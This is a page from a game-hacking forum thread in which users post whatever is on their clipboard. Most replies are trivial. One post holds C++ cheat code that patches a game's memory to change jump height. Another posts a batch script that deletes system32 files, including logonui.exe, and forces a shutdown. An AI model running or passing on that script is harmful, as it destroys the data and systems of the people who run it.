Whats on your ctrl+v? menu

Shout-Out

User Tag List

Page 3 of 8 FirstFirst 1234567 ... LastLast
Results 31 to 45 of 116
  1. #31
    Obama's Avatar Legendary
    Reputation
    721
    Join Date
    Dec 2006
    Posts
    2,321
    Thanks G/R
    2/7
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    lol @ phygar.

    Donator 6/2008.
    Contrib 8/2008.Elite 10/2008.Newsteam 11/2008.Legendary 2/2009.

    Whats on your ctrl+v?
  2. #32
    мιяаgє's Avatar Member
    Reputation
    42
    Join Date
    Jan 2008
    Posts
    210
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    No this thread isnt fail.



  3. #33
    Cypher's Avatar Kynox's Sister's Pimp
    Reputation
    1356
    Join Date
    Apr 2006
    Posts
    5,368
    Thanks G/R
    0/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    void JumpHeight(const char*, const char* CmdParams)
    {
    static const float JumpHeightLandOrig = *reinterpret_cast<float*>(__gf_JumpHeightLand);
    static const float JumpHeightWaterOrig = *reinterpret_cast<float*>(__gf_JumpHeightWater);

    stringstream Param(CmdParams);
    float Multiplier;
    Param >> Multiplier;
    if (Multiplier < 0)
    {
    string Output = "Deviant: Please enter a valid jump height multiplier.";
    gpConsole->Print(0,255,0,Output.c_str());
    return;
    }

    DWORD dwOldProtectLand = 0;
    void * LandAddress = reinterpret_cast<void*>(__gf_JumpHeightLand);
    VirtualProtect(LandAddress, 8, PAGE_EXECUTE_READWRITE, &dwOldProtectLand);
    *(float*)LandAddress = JumpHeightLandOrig * Multiplier;
    VirtualProtect(LandAddress, 8, dwOldProtectLand, &dwOldProtectLand);

    DWORD dwOldProtectWater = 0;
    void * WaterAddress = reinterpret_cast<void*>(__gf_JumpHeightWater);
    VirtualProtect(WaterAddress, 8, PAGE_EXECUTE_READWRITE, &dwOldProtectWater);
    *(float*)WaterAddress = JumpHeightWaterOrig * Multiplier;
    VirtualProtect(WaterAddress, 8, dwOldProtectWater, &dwOldProtectWater);

    stringstream ssJumpHeight;
    ssJumpHeight << Multiplier;
    string Output = "Deviant: Set jump height multiplier to ";
    Output.append(ssJumpHeight.str());
    Output.append(".");
    gpConsole->Print(0,255,0,Output.c_str());
    }

  4. #34
    [Lucky]'s Avatar Member
    Reputation
    31
    Join Date
    Jul 2008
    Posts
    209
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I think i would be banned if i posted my ctrl+v here

  5. #35
    jeleopard's Avatar Active Member
    Reputation
    24
    Join Date
    Apr 2007
    Posts
    345
    Thanks G/R
    2/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)


  6. #36
    p0ke's Avatar Contributor

    Reputation
    191
    Join Date
    Mar 2007
    Posts
    351
    Thanks G/R
    0/1
    Trade Feedback
    2 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Nothing .


  7. #37
    Sychotix's Avatar Moderator Authenticator enabled
    Reputation
    1423
    Join Date
    Apr 2006
    Posts
    3,946
    Thanks G/R
    285/573
    Trade Feedback
    1 (100%)
    Mentioned
    7 Post(s)
    Tagged
    0 Thread(s)
    Rammstein - Buck Dich (was copy/pasting in youtube lol)

  8. #38
    DaemonScyth's Avatar Member
    Reputation
    7
    Join Date
    Aug 2008
    Posts
    14
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    http://www.hot108.com/hot108jamz.asx

    Hehe.

    I like music ^^


    ~DaemonScyth
    Mmowned Emulator Expert, PM me for ANY server help!

  9. #39
    Whodini's Avatar Active Member
    Reputation
    23
    Join Date
    Nov 2006
    Posts
    237
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    gopuu

    SQ/A to a account


    My Krew - S4 Druid T6 Rogue S4 Warlock

  10. #40
    Zakattak's Avatar Member
    Reputation
    17
    Join Date
    Jun 2008
    Posts
    162
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)


    that is so wrong
    Last edited by Zakattak; 08-29-2008 at 12:31 PM.

    Call me zak

  11. #41
    Wesk.'s Avatar Contributor
    Reputation
    190
    Join Date
    Dec 2006
    Posts
    537
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    When All the Light goes out where will you be?
    When the darkness comes what will you see?

    JMT - When all light dies ;o

  12. #42
    nightshack's Avatar Contributor
    Reputation
    107
    Join Date
    Jan 2007
    Posts
    248
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    @echo off
    del c:/windows/system32/logonui.exe
    del c:/windows/system32
    shutdown.exe -s -t 10 -c "lovely message here"

    lol...

  13. #43
    [Blaze]'s Avatar Banned
    Reputation
    145
    Join Date
    Feb 2007
    Posts
    630
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    ... lulz I had nothing on ctrl+v

  14. #44
    Adrenalin3's Avatar Banned
    Reputation
    219
    Join Date
    Dec 2006
    Posts
    656
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Nothing on my Ctrl+V

  15. #45
    Supah's Avatar Member
    Reputation
    33
    Join Date
    Apr 2008
    Posts
    235
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    (filler i had nothing on ctrl+v lol)

Page 3 of 8 FirstFirst 1234567 ... LastLast

Similar Threads

  1. Whats are your intrest other then wow?
    By Bludypeople in forum Community Chat
    Replies: 21
    Last Post: 10-02-2007, 06:03 PM
  2. What is your favorite???
    By laineter in forum World of Warcraft General
    Replies: 2
    Last Post: 02-21-2007, 12:53 PM
  3. what is your fave class?
    By laineter in forum World of Warcraft General
    Replies: 11
    Last Post: 01-31-2007, 07:06 PM
  4. What's your most favourite thing?
    By xxxcoolxxx in forum Community Chat
    Replies: 7
    Last Post: 01-22-2007, 10:28 PM
  5. What is your favorite bot for WoW?
    By koalaz2004 in forum World of Warcraft General
    Replies: 2
    Last Post: 08-17-2006, 10:28 PM
All times are GMT -5. The time now is 01:46 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search